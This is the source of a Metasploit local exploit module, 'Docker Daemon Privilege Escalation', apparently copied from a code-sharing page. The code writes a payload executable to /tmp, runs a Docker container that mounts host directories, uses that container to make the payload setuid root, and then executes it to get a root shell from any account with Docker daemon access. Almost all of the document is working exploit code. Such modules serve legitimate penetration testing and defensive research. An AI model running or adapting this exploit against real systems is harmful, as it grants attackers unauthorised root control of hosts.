Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::Linux::Priv
11
  include Msf::Post::Linux::System
12
  include Msf::Exploit::EXE
13
  include Msf::Exploit::FileDropper
14
  prepend Msf::Exploit::Remote::AutoCheck
15

16
  def initialize(info={})
17
    super(update_info(info, {
18
      'Name'           => 'Docker Daemon Privilege Escalation',
19
      'Description'    => %q{
20
        This module obtains root privileges from any host account with access to the
21
        Docker daemon. Usually this includes accounts in the `docker` group.
22
      },
23
      'License'        => MSF_LICENSE,
24
      'Author'         => ['forzoni'],
25
      'DisclosureDate' => '2016-06-28',
26
      'Platform'       => 'linux',
27
      'Arch'           => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
28
      'Targets'        => [ ['Automatic', {}] ],
29
      'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 60 },
30
      'SessionTypes'   => ['shell', 'meterpreter'],
31
      'DefaultTarget'  => 0
32
      }
33
    ))
34
    register_advanced_options([
35
      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
36
    ])
37
  end
38

39
  def base_dir
40
    datastore['WritableDir'].to_s
41
  end
42

43
  def check
44
    if cmd_exec('docker ps && echo true') =~ /true$/
45
      print_good("Docker daemon is accessible.")
46
      Exploit::CheckCode::Vulnerable
47
    else
48
      print_error("Failed to access Docker daemon.")
49
      Exploit::CheckCode::Safe
50
    end
51
  end
52

53
  def exploit
54
    if !datastore['ForceExploit'] && is_root?
55
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
56
    end
57

58
    unless writable? base_dir
59
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
60
    end
61

62
    if nosuid? base_dir
63
      fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
64
    end
65

66
    pl = generate_payload_exe
67
    exe_path = "#{base_dir}/#{rand_text_alpha(6..11)}"
68
    print_status("Writing payload executable to '#{exe_path}'")
69

70
    write_file(exe_path, pl)
71
    register_file_for_cleanup(exe_path)
72

73
    print_status("Executing script to create and run docker container")
74
    vprint_status cmd_exec("chmod +x #{exe_path}")
75
    vprint_status shell_script(exe_path)
76
    vprint_status cmd_exec("sh -c '#{shell_script(exe_path)}'")
77

78
    print_status "Waiting #{datastore['WfsDelay']}s for payload"
79
  end
80

81
  def shell_script(exploit_path)
82
    deps = %w(/bin /lib /lib64 /etc /usr /opt) + [base_dir]
83
    dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
84

85
    %Q{
86
      IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"`
87
      EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}; chmod +x #{exploit_path}"
88
      docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
89
      docker rmi -f $IMG
90
      #{exploit_path}
91
    }.strip.split("\n").map(&:strip).join(';')
92
  end
93
end
94

95